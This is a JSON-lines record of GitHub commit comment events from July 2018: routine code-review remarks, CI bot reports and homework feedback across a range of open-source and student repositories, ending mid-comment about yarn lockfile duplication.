{"id":"8024585475","type":"CommitCommentEvent","actor":{"login":"jackthebaptist"},"repo":{"name":"jackthebaptist/fakefetch"},"payload":{"comment":{"id":29848653,"position":null,"line":null,"path":null,"commit_id":"8a7138d1b94f7268d0e5ab2a06771664f235da28","created_at":"2018-07-26T18:56:02Z","updated_at":"2018-07-26T18:56:02Z","author_association":"OWNER","body":"**fakefetch\r\n"}},"created_at":"2018-07-26T18:56:02Z"}
{"id":"8024586871","type":"CommitCommentEvent","actor":{"login":"raniagasti123"},"repo":{"name":"raniagasti123/Sample1"},"payload":{"comment":{"id":29848658,"position":null,"line":null,"path":null,"commit_id":"b82b88e37d355260924ac963f95c42b9316056cd","created_at":"2018-07-26T18:56:18Z","updated_at":"2018-07-26T18:56:18Z","author_association":"OWNER","body":"dsfdsfdsfdsfds\r\ndsfdsfds\r\ndsfdsfdsfsa"}},"created_at":"2018-07-26T18:56:18Z"}
{"id":"8024587972","type":"CommitCommentEvent","actor":{"login":"JPrisner"},"repo":{"name":"open-quantum-safe/openssl"},"payload":{"comment":{"id":29848663,"position":null,"line":null,"path":null,"commit_id":"8358302d47c8b6e0680d91ffee11302331f17a69","created_at":"2018-07-26T18:56:31Z","updated_at":"2018-07-26T18:56:31Z","author_association":"NONE","body":"PICNIC signatures will be larger than SSL3_RT_MAX_PLAIN_LENGTH (16384)."}},"created_at":"2018-07-26T18:56:31Z"}
{"id":"8024588361","type":"CommitCommentEvent","actor":{"login":"vpitts"},"repo":{"name":"prebid/prebid.github.io"},"payload":{"comment":{"id":29848666,"position":null,"line":null,"path":null,"commit_id":"e5aa4b25d7ea73ab5993992ea87b0c571cc61fb8","created_at":"2018-07-26T18:56:36Z","updated_at":"2018-07-26T18:56:36Z","author_association":"NONE","body":"@jeanstemp The plugin is extend the Brightcove Player application - not prebid.js.  I would change this sentence:\r\nPlugins can be used to enable an application to work with Prebid.js to implement a header bidding solution.\r\nTo:\r\nPlugins can be used to enable an application, such as the video player, to work with Prebid.js to implement a pre-bidding solution."}},"created_at":"2018-07-26T18:56:36Z"}
{"id":"8024588939","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29848669,"position":33,"line":179,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/coroutines/CoroutineTransformerMethodVisitor.kt","commit_id":"765e2193a9654fae47f08e9187f5c59e4bf1d3e9","created_at":"2018-07-26T18:56:43Z","updated_at":"2018-07-26T18:56:43Z","author_association":"MEMBER","body":"TBH, I'm not sure this commit fixes the issue.\r\nFor non-suspend functions we have the same situation: start label is located after the assignment and it works fine\r\n```\r\nfun foo() {\r\n    val a = 2\r\n}\r\n\r\npublic final static foo()V\r\n   L0\r\n    LINENUMBER 13 L0\r\n    ICONST_2\r\n    ISTORE 0\r\n   L1\r\n    LINENUMBER 14 L1\r\n    RETURN\r\n   L2\r\n    LOCALVARIABLE a I L1 L2 0\r\n```"}},"created_at":"2018-07-26T18:56:43Z"}
{"id":"8024594546","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29848688,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-26T18:57:50Z","updated_at":"2018-07-26T18:57:50Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: Tests Failed (2368 of 2935 tests passed, 56 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 563 tests had: Table big diffs.\n * 79 tests had: ESO big diffs.\n * 99 tests had: AUD diffs.\n * 156 tests had: BND diffs.\n * 172 tests had: ESO small diffs.\n * 151 tests had: MDD diffs.\n * 156 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 35 tests had: MTR big diffs.\n * 102 tests had: MTR small diffs.\n * 18 tests had: ERR diffs.\n * 1 test had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 56\n * Failed: 567\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.68%25-red.png)</a> \n"}},"created_at":"2018-07-26T18:57:50Z"}
{"id":"8024598776","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848703,"position":94,"line":5184,"path":"epan/dissectors/packet-ssl-utils.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:58:41Z","updated_at":"2018-07-26T18:58:41Z","author_association":"NONE","body":"We should avoid having to recreate this array on every call, but I'm not sure how best to do that and avoid duplicating it in both callers of this function.\r\n"}},"created_at":"2018-07-26T18:58:41Z"}
{"id":"8024602207","type":"CommitCommentEvent","actor":{"login":"bhiggins"},"repo":{"name":"adamnsm2/wireshark"},"payload":{"comment":{"id":29848715,"position":113,"line":5203,"path":"epan/dissectors/packet-ssl-utils.c","commit_id":"504aebf5ec37bbe1cef085735a9301e0860254aa","created_at":"2018-07-26T18:59:23Z","updated_at":"2018-07-26T18:59:23Z","author_association":"NONE","body":"dedent the rest of this function\r\n"}},"created_at":"2018-07-26T18:59:23Z"}
{"id":"8024605358","type":"CommitCommentEvent","actor":{"login":"leleuj"},"repo":{"name":"bujiio/buji-pac4j"},"payload":{"comment":{"id":29848723,"position":null,"line":null,"path":null,"commit_id":"784b02e199ab825cf2f9b21aee0f5dbdd8a22782","created_at":"2018-07-26T18:59:58Z","updated_at":"2018-07-26T18:59:58Z","author_association":"MEMBER","body":"@yxc023: did you test this change? It doesn't work for me..."}},"created_at":"2018-07-26T18:59:58Z"}
{"id":"8024606658","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29848729,"position":null,"line":null,"path":null,"commit_id":"32dfab8b8ac71afe1f1554699c240068a95e76e0","created_at":"2018-07-26T19:00:13Z","updated_at":"2018-07-26T19:00:13Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/32dfab8b8ac71afe1f1554699c240068a95e76e0/index.html"}},"created_at":"2018-07-26T19:00:13Z"}
{"id":"8024607180","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29848734,"position":5,"line":109,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/RpczZPageHandler.java","commit_id":"879429864622c2cbddbdf44d5110e8c93981561d","created_at":"2018-07-26T19:00:18Z","updated_at":"2018-07-26T19:00:18Z","author_association":"OWNER","body":"@songy23 - I created Style.java which you will see below. In Rpcz, I added the Style interface seen above. Is this what you intended for the CSS workaround, or am I off track? I think since the interface is not declared within Rpcz, it is giving me a build failure error. Can you spot errors and suggest corrections?\r\n```\r\n> Task :opencensus-contrib-zpages:compileJava\r\n/opencensus-java/contrib/zpages/src/main/java/io/opencensus/contrib/zpages/RpczZPageHandler.java:109: error: cannot find symbol\r\nfinal class RpczZPageHandler extends ZPageHandler implements Style {\r\n                                                             ^\r\nsymbol: class Style\r\n1 error\r\n> Task :opencensus-contrib-zpages:compileJava FAILED\r\nFAILURE: Build failed with an exception.\r\n``` "}},"created_at":"2018-07-26T19:00:18Z"}
{"id":"8024608423","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29848736,"position":null,"line":null,"path":null,"commit_id":"330cf78c83a19b5c29afd77b81096bc0c94e80cc","created_at":"2018-07-26T19:00:31Z","updated_at":"2018-07-26T19:00:31Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/help-us-build-the-new-dashboard/86468/247\n"}},"created_at":"2018-07-26T19:00:31Z"}
{"id":"8024611039","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29848740,"position":39,"line":39,"path":"Homework #8/Homework8.java","commit_id":"9abf3a4e6f4cb6fd36294b1af8a9fd98f36eb32a","created_at":"2018-07-26T19:01:03Z","updated_at":"2018-07-26T19:01:03Z","author_association":"OWNER","body":"можна ще\r\n\"\\\\$(\\\\d*)+\\\\.\\\\d{2}\""}},"created_at":"2018-07-26T19:01:03Z"}
{"id":"8024615379","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29848748,"position":12,"line":12,"path":"Homework #9/Homework9.java","commit_id":"c97e8fece910a10c451767b3e9f31c30b48dfe2a","created_at":"2018-07-26T19:01:54Z","updated_at":"2018-07-26T19:01:54Z","author_association":"OWNER","body":"цей об'єкт краще створити ззовні один раз"}},"created_at":"2018-07-26T19:01:54Z"}
{"id":"8024616960","type":"CommitCommentEvent","actor":{"login":"leleuj"},"repo":{"name":"bujiio/buji-pac4j"},"payload":{"comment":{"id":29848753,"position":null,"line":null,"path":null,"commit_id":"784b02e199ab825cf2f9b21aee0f5dbdd8a22782","created_at":"2018-07-26T19:02:14Z","updated_at":"2018-07-26T19:02:14Z","author_association":"MEMBER","body":"Reverting..."}},"created_at":"2018-07-26T19:02:14Z"}
{"id":"8024618556","type":"CommitCommentEvent","actor":{"login":"Naveen-Kolagani"},"repo":{"name":"Naveen-Kolagani/hello-world"},"payload":{"comment":{"id":29848755,"position":null,"line":null,"path":null,"commit_id":"978912ac5cdf8e766d232b0a89828ecc294da662","created_at":"2018-07-26T19:02:30Z","updated_at":"2018-07-26T19:02:30Z","author_association":"OWNER","body":"I like Machine Learning"}},"created_at":"2018-07-26T19:02:30Z"}
{"id":"8024620441","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848758,"position":null,"line":null,"path":null,"commit_id":"940a588c1236aadc3066b4273b69116880aa8cff","created_at":"2018-07-26T19:02:53Z","updated_at":"2018-07-26T19:02:53Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/940a588c1236aadc3066b4273b69116880aa8cff/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T19:02:53Z"}
{"id":"8024620450","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/SlicerJupyter"},"payload":{"comment":{"id":29848759,"position":null,"line":null,"path":null,"commit_id":"d54771c0aa81fb10cc6d079dc23c3e86764e5032","created_at":"2018-07-26T19:02:53Z","updated_at":"2018-07-26T19:02:53Z","author_association":"MEMBER","body":"I thought Slicer had crashed. (partly because the kernel currently doesn't give any output for `varname<ENTER>` -- should print the output of `repr`, but that's a separate issue).\r\n\r\nI would prefer to just have the Slicer window backgrounded behind the browswer, but I don't think that is possible. So printing a notice in the notebook that `Slicer window has been minimized` would be helpful."}},"created_at":"2018-07-26T19:02:53Z"}
{"id":"8024626210","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848769,"position":41,"line":41,"path":"otus/app/deploy/state/participant-create/participant-create-state-provider.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:04:04Z","updated_at":"2018-07-26T19:04:04Z","author_association":"MEMBER","body":"Remover linha comentada."}},"created_at":"2018-07-26T19:04:04Z"}
{"id":"8024626266","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29848770,"position":21,"line":21,"path":"Homework #9/Homework9.java","commit_id":"c97e8fece910a10c451767b3e9f31c30b48dfe2a","created_at":"2018-07-26T19:04:05Z","updated_at":"2018-07-26T19:04:05Z","author_association":"OWNER","body":"цю команду краще занести в if, щоб цей блок не був порожній\r\nабо\r\nif (!((variable >= variable1) && (variable <= variable2))) {\r\n               throw new Exception1(\"Please input the different value of the variable!\");\r\n}\r\n"}},"created_at":"2018-07-26T19:04:05Z"}
{"id":"8024626631","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848771,"position":58,"line":58,"path":"otus/app/deploy/state/participant-create/participant-create-state-provider.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:04:10Z","updated_at":"2018-07-26T19:04:10Z","author_association":"MEMBER","body":"Remover linha comentada."}},"created_at":"2018-07-26T19:04:10Z"}
{"id":"8024628479","type":"CommitCommentEvent","actor":{"login":"rjmaan"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29848775,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T19:04:33Z","updated_at":"2018-07-26T19:04:33Z","author_association":"NONE","body":"a promising project"}},"created_at":"2018-07-26T19:04:33Z"}
{"id":"8024628903","type":"CommitCommentEvent","actor":{"login":"mashen456"},"repo":{"name":"mashen456/schach-spielen.eu-Bot"},"payload":{"comment":{"id":29848778,"position":null,"line":null,"path":null,"commit_id":"9e980b2d350f00576db8e45b3ed05af01715ba8f","created_at":"2018-07-26T19:04:39Z","updated_at":"2018-07-26T19:04:39Z","author_association":"OWNER","body":"init"}},"created_at":"2018-07-26T19:04:39Z"}
{"id":"8024631093","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848781,"position":42,"line":82,"path":"otus/app/ux-component/dashboard-home-display/dashboard-home-display-component.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:05:07Z","updated_at":"2018-07-26T19:05:07Z","author_association":"MEMBER","body":"Existe algum motivo para o comentário?"}},"created_at":"2018-07-26T19:05:07Z"}
{"id":"8024631662","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29848782,"position":null,"line":null,"path":null,"commit_id":"04a25dccd88f92a457cac261b60e3c06c7082afe","created_at":"2018-07-26T19:05:13Z","updated_at":"2018-07-26T19:05:13Z","author_association":"CONTRIBUTOR","body":"Well, from your screenshot, it is a different request than the one allowed in the regional list, I will remove it."}},"created_at":"2018-07-26T19:05:13Z"}
{"id":"8024634863","type":"CommitCommentEvent","actor":{"login":"nicktime"},"repo":{"name":"javisar/ONI-Modloader"},"payload":{"comment":{"id":29848789,"position":39,"line":139,"path":"Source/Injector/Injector.cs","commit_id":"2b5c28a7f72f8de230775bb14b9781a8f799f56e","created_at":"2018-07-26T19:05:51Z","updated_at":"2018-07-26T19:05:51Z","author_association":"NONE","body":"Will Injector be adding a Radioactive disease even with no Mods installed?"}},"created_at":"2018-07-26T19:05:51Z"}
{"id":"8024635298","type":"CommitCommentEvent","actor":{"login":"StandardProgramer"},"repo":{"name":"Rapptz/discord.py"},"payload":{"comment":{"id":29848791,"position":null,"line":null,"path":null,"commit_id":"1863a1c6636f53592519320a173ec9573c090c0b","created_at":"2018-07-26T19:05:57Z","updated_at":"2018-07-26T19:05:57Z","author_association":"NONE","body":"This was a pain to figure out. Thanks so much!"}},"created_at":"2018-07-26T19:05:57Z"}
{"id":"8024637770","type":"CommitCommentEvent","actor":{"login":"PiBa-NL"},"repo":{"name":"PiBa-NL/FreeBSD-ports"},"payload":{"comment":{"id":29848794,"position":10,"line":37,"path":"net/pfSense-pkg-haproxy-devel/files/usr/local/www/haproxy/haproxy_files.php","commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T19:06:26Z","updated_at":"2018-07-26T19:06:26Z","author_association":"OWNER","body":"hmm urg.. your right, as usual :). sorry! ill send a fix."}},"created_at":"2018-07-26T19:06:26Z"}
{"id":"8024639082","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29848799,"position":47,"line":29,"path":"src/components/EntityList/EntityList.tsx","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-26T19:06:42Z","updated_at":"2018-07-26T19:06:42Z","author_association":"NONE","body":"rerender!"}},"created_at":"2018-07-26T19:06:42Z"}
{"id":"8024639328","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848800,"position":41,"line":41,"path":"otus/app/deploy/state/participant-create/participant-create-state-provider.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:06:46Z","updated_at":"2018-07-26T19:06:46Z","author_association":"MEMBER","body":"não está, esse não é o ultimo commit"}},"created_at":"2018-07-26T19:06:46Z"}
{"id":"8024640112","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29848805,"position":13,"line":13,"path":"HomeWork9/Methods.java","commit_id":"94f991eec0f07b8e6eb1ec03b9e8485cd11fc359","created_at":"2018-07-26T19:06:55Z","updated_at":"2018-07-26T19:06:55Z","author_association":"OWNER","body":"цей об'єкт краще створювати один раз і не в цьому методі"}},"created_at":"2018-07-26T19:06:55Z"}
{"id":"8024640570","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848806,"position":58,"line":58,"path":"otus/app/deploy/state/participant-create/participant-create-state-provider.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:07:01Z","updated_at":"2018-07-26T19:07:01Z","author_association":"MEMBER","body":"não está, esse não é o ultimo commit"}},"created_at":"2018-07-26T19:07:01Z"}
{"id":"8024640778","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848808,"position":119,"line":119,"path":"otus/app/ux-component/participant-create/participant-create-controller.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:07:04Z","updated_at":"2018-07-26T19:07:04Z","author_association":"MEMBER","body":"Remover linhas comentadas."}},"created_at":"2018-07-26T19:07:04Z"}
{"id":"8024642222","type":"CommitCommentEvent","actor":{"login":"Xp-Joe"},"repo":{"name":"Xp-Joe/token-profile"},"payload":{"comment":{"id":29848811,"position":1,"line":1,"path":"add sssgh token and logo","commit_id":"d902f859d89591688c07d2c861d09ee85acae489","created_at":"2018-07-26T19:07:22Z","updated_at":"2018-07-26T19:07:22Z","author_association":"OWNER","body":"\"symbol\": \"SSSGH\",\r\n+  \"address\": \"0xa57417793017a9509af7a5d3556dce98e23723fa\",\r\n+  \"website\": \"https://medibloc.org/ch/\",\r\n+  \"whitepaper\": \"https://medibloc-homepage.oss-us-west-1.aliyuncs.com/whitepaper/medibloc_whitepaper_ch.pdf\",\r\n+  \"state\": \"NORMAL\",\r\n+  \"published_on\": \"2018-07-27\"\r\n+} "}},"created_at":"2018-07-26T19:07:22Z"}
{"id":"8024646481","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848818,"position":42,"line":82,"path":"otus/app/ux-component/dashboard-home-display/dashboard-home-display-component.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:08:14Z","updated_at":"2018-07-26T19:08:14Z","author_association":"MEMBER","body":"essa function não está em uso. irei remover"}},"created_at":"2018-07-26T19:08:14Z"}
{"id":"8024654175","type":"CommitCommentEvent","actor":{"login":"Xp-Joe"},"repo":{"name":"Xp-Joe/token-profile"},"payload":{"comment":{"id":29848836,"position":null,"line":null,"path":null,"commit_id":"d902f859d89591688c07d2c861d09ee85acae489","created_at":"2018-07-26T19:09:51Z","updated_at":"2018-07-26T19:09:51Z","author_association":"OWNER","body":"![gh](https://user-images.githubusercontent.com/41712753/43283087-844a4d8c-914a-11e8-8797-ea9e85c5a2ce.png)\r\n"}},"created_at":"2018-07-26T19:09:51Z"}
{"id":"8024655735","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29848841,"position":27,"line":27,"path":"Homework_7/Task_1/Main.java","commit_id":"3730b9c49002b9ea8ace60b70478f98dba2481ba","created_at":"2018-07-26T19:10:11Z","updated_at":"2018-07-26T19:10:11Z","author_association":"OWNER","body":"в Set є спеціальний метод, який нам верне перетин колекцій"}},"created_at":"2018-07-26T19:10:11Z"}
{"id":"8024657219","type":"CommitCommentEvent","actor":{"login":"hoffrocket"},"repo":{"name":"scala/community-builds"},"payload":{"comment":{"id":29848844,"position":null,"line":null,"path":null,"commit_id":"47d42e57f90e0588e0cdec1261773f36cd990b69","created_at":"2018-07-26T19:10:29Z","updated_at":"2018-07-26T19:10:29Z","author_association":"NONE","body":"Thanks Seth, sorry for the non-determinism here. "}},"created_at":"2018-07-26T19:10:29Z"}
{"id":"8024661536","type":"CommitCommentEvent","actor":{"login":"rouault"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29848859,"position":null,"line":null,"path":null,"commit_id":"9ec6971ca0dd41df454461387954def4f904cc60","created_at":"2018-07-26T19:11:23Z","updated_at":"2018-07-26T19:11:23Z","author_association":"MEMBER","body":"@jef Hum, I don't think this commit is appropriate either. It breaks reading any NAS file, and the ogr_nas.py tests in particular. I guess that #720 is a marginal enough case that we can let unadressed for now until we find a better solution, rather than breaking cases that worked previously"}},"created_at":"2018-07-26T19:11:23Z"}
{"id":"8024662022","type":"CommitCommentEvent","actor":{"login":"sjking2000"},"repo":{"name":"YashZolmajdi/PR-DEMO"},"payload":{"comment":{"id":29848860,"position":6,"line":14,"path":"PR_New","commit_id":"22adc263c32d3a3f9dfbfeac7dd657c98e299508","created_at":"2018-07-26T19:11:29Z","updated_at":"2018-07-26T19:11:29Z","author_association":"NONE","body":"without a trace"}},"created_at":"2018-07-26T19:11:29Z"}
{"id":"8024662600","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29848862,"position":null,"line":null,"path":null,"commit_id":"bf515bcc47c92a888aa0ee4a92fc78a28fbcbdee","created_at":"2018-07-26T19:11:36Z","updated_at":"2018-07-26T19:11:36Z","author_association":"COLLABORATOR","body":"@ilia3101 : I did it nearly in the same way like your shadows/highlights implementation, it is only the 2 sliders synced into one and without a blurred picture. The effect looks more or less like a contrast slider. I first implemented a \"real contrast\", but this one had big problems because it was applied after your WB/exposure matrix. Thats why clipped areas were just grey when lowering the contrast value. The new method is better here. Let me know if you like or dislike... hope you are not angry that I change all your code..."}},"created_at":"2018-07-26T19:11:36Z"}
{"id":"8024662625","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848863,"position":null,"line":null,"path":null,"commit_id":"7c33d4da93884c05733025a6b4a0ce5e04e6e3cf","created_at":"2018-07-26T19:11:36Z","updated_at":"2018-07-26T19:11:36Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/7c33d4da93884c05733025a6b4a0ce5e04e6e3cf/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T19:11:36Z"}
{"id":"8024665484","type":"CommitCommentEvent","actor":{"login":"tcgraham23"},"repo":{"name":"tcgraham23/LocalRepo"},"payload":{"comment":{"id":29848865,"position":null,"line":null,"path":null,"commit_id":"3c6fa56f978d4ef9de57c33a762b157edb67881f","created_at":"2018-07-26T19:12:12Z","updated_at":"2018-07-26T19:12:12Z","author_association":"OWNER","body":"this comment looks amazing "}},"created_at":"2018-07-26T19:12:12Z"}
{"id":"8024666645","type":"CommitCommentEvent","actor":{"login":"AidanM11"},"repo":{"name":"AidanM11/Lane-Detection---Python-OpenCV"},"payload":{"comment":{"id":29848870,"position":null,"line":null,"path":null,"commit_id":"d1d34eab96819a24ebd807879bd26f824c30aef0","created_at":"2018-07-26T19:12:25Z","updated_at":"2018-07-26T19:12:25Z","author_association":"OWNER","body":"You know, looking back on this, it wasn't that bad of a fuck-up."}},"created_at":"2018-07-26T19:12:25Z"}
{"id":"8024668761","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29848876,"position":5,"line":109,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/RpczZPageHandler.java","commit_id":"879429864622c2cbddbdf44d5110e8c93981561d","created_at":"2018-07-26T19:12:52Z","updated_at":"2018-07-26T19:12:52Z","author_association":"NONE","body":"`Style.java` needs to be declared as an `interface` rather than a `class` to be implemented. Anyway, what I suggested is to simply add a `Style.java` class and get the style string from it, like:\r\n```java\r\nfinal class Style {\r\n  static final String style  = ...;\r\n}\r\n```\r\nAnd in `RpczZPageHandler.java` you can do:\r\n```java\r\nprivate static void emitStyle(PrintWriter out) {\r\n  out.write(\"<style>\\n\");\r\n  out.write(Style.style);\r\n  out.write(\"</style>\\n\");\r\n}\r\n```\r\nAlso, if you could unify the class and id names for all the zpages, in other classes (like `TracezZPageHandler.java`) you can also use `Style.style`. "}},"created_at":"2018-07-26T19:12:52Z"}
{"id":"8024669720","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29848882,"position":13,"line":13,"path":"Practice_8/task3/Main.java","commit_id":"5d2fad4b5c266ec966b01a44627074f9ade9a796","created_at":"2018-07-26T19:13:05Z","updated_at":"2018-07-26T19:13:05Z","author_association":"OWNER","body":"Все добре, молодець"}},"created_at":"2018-07-26T19:13:05Z"}
{"id":"8024671812","type":"CommitCommentEvent","actor":{"login":"mwarning"},"repo":{"name":"dakhnod/Meshenger"},"payload":{"comment":{"id":29848887,"position":null,"line":null,"path":null,"commit_id":"4cc813e6a80705e188357ac100eff421c3992faf","created_at":"2018-07-26T19:13:31Z","updated_at":"2018-07-26T19:13:31Z","author_association":"CONTRIBUTOR","body":"thanks!!"}},"created_at":"2018-07-26T19:13:31Z"}
{"id":"8024671863","type":"CommitCommentEvent","actor":{"login":"adrianodennanni"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29848888,"position":13,"line":13,"path":"app/views/tweets/index.html.erb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T19:13:32Z","updated_at":"2018-07-26T19:13:32Z","author_association":"NONE","body":"Suponha que alguém cadastrou uma frase escrito \"troll\" ao invés de uma url de uma imagem. O Rails vai tentar carregar um arquivo chamado \"troll\", e vai renderizar um erro. Aí o twitter quebraria para todos usuários :/"}},"created_at":"2018-07-26T19:13:32Z"}
{"id":"8024672574","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29848890,"position":null,"line":null,"path":null,"commit_id":"771dff2211217fca7d0f5acb096b9c06c580f36c","created_at":"2018-07-26T19:13:41Z","updated_at":"2018-07-26T19:13:41Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1073](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1073).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1073-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-26T19:13:41Z"}
{"id":"8024672596","type":"CommitCommentEvent","actor":{"login":"Xp-Joe"},"repo":{"name":"Xp-Joe/token-profile"},"payload":{"comment":{"id":29848891,"position":null,"line":null,"path":null,"commit_id":"52f4f91bb44242dd34e1e3b48350a86228202757","created_at":"2018-07-26T19:13:41Z","updated_at":"2018-07-26T19:13:41Z","author_association":"OWNER","body":"![gh](https://user-images.githubusercontent.com/41712753/43283280-0e3adeee-914b-11e8-9c9d-c34312e86747.png)\r\n"}},"created_at":"2018-07-26T19:13:41Z"}
{"id":"8024675875","type":"CommitCommentEvent","actor":{"login":"ryankshaw"},"repo":{"name":"instructure/instructure-ui"},"payload":{"comment":{"id":29848896,"position":7,"line":65,"path":"packages/__docs__/package.json","commit_id":"d49430f4757b4d42578ac43d05bbd548d54003e5","created_at":"2018-07-26T19:14:23Z","updated_at":"2018-07-26T19:14:23Z","author_association":"CONTRIBUTOR","body":"just wanting to add to that ^: if you are relying on blindly accepting whatever yarn does every time you `yarn install` or `yarn upgrade` you are going to eventually get a ton of duplicate packages and your webpacked JS bundle size is going to bloat because of it. for example, it might be perfectly fine to use two copies of `prop-types`, or `lodash` or `tinymce` or any other library you might use, but you (and your users) don't actually want to do that. and if you yarn install something that needs `\"lodash\": \"^4.3.1\"` and you already had a yarn.lock entry for `lodash@^4: 4.2.0` by default yarn will create a new yarn.lock entry for `lodash@^4.3.1` and leave the `4.2.0` one as-is and now you'll be 